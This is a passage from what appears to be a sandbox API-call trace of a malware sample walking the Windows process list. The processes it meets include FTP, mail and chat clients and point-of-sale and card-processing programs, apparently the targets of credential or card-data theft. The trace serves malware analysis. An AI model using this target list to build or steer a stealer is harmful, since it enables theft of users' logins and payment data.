dwFlags=0x0, szExeFile="against.exe")) returned 1 [0184.105] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0184.108] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0184.121] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0184.124] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0184.129] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0184.138] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0184.142] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0184.145] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0184.147] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0184.149] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0184.152] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0184.155] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0184.158] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0184.160] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0184.163] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0184.172] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0184.175] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0184.178] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0184.181] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0184.184] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0184.187] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0184.190] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0184.192] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0184.197] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0184.200] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0184.203] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0184.205] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0184.209] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0184.216] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0184.219] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0184.222] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0184.225] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0184.228] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0184.231] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0184.234] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0184.236] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0184.239] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0184.242] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0184.246] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0184.249] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0184.254] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0184.257] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0184.260] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0184.263] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0184.266] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0184.269] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0184.272] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0184.275] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0184.278] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0184.281] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0184.284] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0184.287] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0184.292] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0184.295] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0184.299] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0184.302] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0184.305] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0184.307] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0184.311] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.314] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0184.317] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.320] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.322] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0184.325] CloseHandle (hObject=0x1998) returned 1 [0184.325] Sleep (dwMilliseconds=0x64) [0184.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x31c [0184.447] Process32First (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.449] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.453] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.456] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.458] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.461] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.463] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.470] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.473] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.477] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.480] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.482] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.484] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.487] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.489] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.492] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.494] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.496] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.500] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.504] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.506] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0184.508] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 